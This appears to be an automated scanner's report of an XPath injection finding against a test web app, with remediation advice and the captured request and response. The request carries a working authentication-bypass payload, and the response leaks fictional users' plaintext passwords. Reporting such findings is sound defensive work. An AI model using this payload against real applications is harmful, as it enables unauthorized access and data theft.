XPATH Injection #772
Description
XPATH Injection
Severity: Critical Discovered: 08 of November-2025, 09:36 PM UTC
CWE ID
CWE-643
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Details
The target application uses user-controllable input to construct an XPath query for XML data. An attacker can modify the syntax, content, or commands of the XML before it is processed by an end system. This can lead to unauthorized code execution, data leakage, and data modification. The attacker can also leverage the information to launch further attacks.
Possible exposure
Execute Unauthorized Code or Commands; Read Application Data; Modify Application Data
Remediation suggestions
Ensure that user-controllable input is properly sanitized and validated before being used to construct an XPath query. Use parameterized queries or prepared statements to prevent injection attacks. Avoid using user-controllable input to construct XPath queries whenever possible. If user-controllable input must be used, ensure that it is properly sanitized and validated. Use allow-lists of trusted input to prevent injection attacks.
Request
GET http://docker:3000/api/partners/partnerLogin?password=Heisenberg123%27+or+%27a%27%3D%27a&username=walter100 HTTP/1.1
Cookie: bc-calls-counter=1762637789485; connect.sid=M83qZ9HPh59EkGVT6LBGJgZWR9ez-oXA.kbQSqtxgNWvbWiwyBgkWk%2B5S92cygfwfwt20LgajYNk
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.154 Safari/537.36
content-type: text/xmlResponse
HTTP/1.1 200
date: Sat, 08 Nov 2025 21:36:45 GMT
Connection: close
Set-Cookie: bc-calls-counter=1762637805581; domain=docker
content-type: text/xml
Cache-Control: public, max-age=99999
content-length: 1031
x-xss-protection: 0
x-content-type-options: 1
content-security-policy: default-src * 'unsafe-inline' 'unsafe-eval'
strict-transport-security: max-age=0
<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>Walter White</name>
<age>50</age>
<profession>Chemistry Teacher</profession>
<residency country="US" state="New Mexico" city="Albuquerque"/>
<username>walter100</username>
<password>Heisenberg123</password>
<wealth>15M USD</wealth>
<name>Jesse Pinkman</name>
<age>25</age>
<profession>Professional Product Distributer</profession>
<residency country="US" state="New Mexico" city="Yo Moma"/>
<username>dapinkman69</username>
<password>Yoyo1!</password>
<wealth>5M USD</wealth>
<name>Michael Ehrmantraut</name>
<age>65</age>
<profession>Personal Security Agent</profession>
<residency country="US" state="New Mexico" city="Albuquerque"/>
<username>_safetyman_</username>
<password>LittleKid777</password>
<wealth>50M USD</wealth>
<name>Gus Fring</name>
<age>52</age>
<profession>Restaurant Chain Owner</profession>
<residency country="US" state="New Mexico" city="Albuquerque"/>
<username>ChickMan</username>
<password>GoodChicken4U</password>
<wealth>Too much USD</wealth>
</root>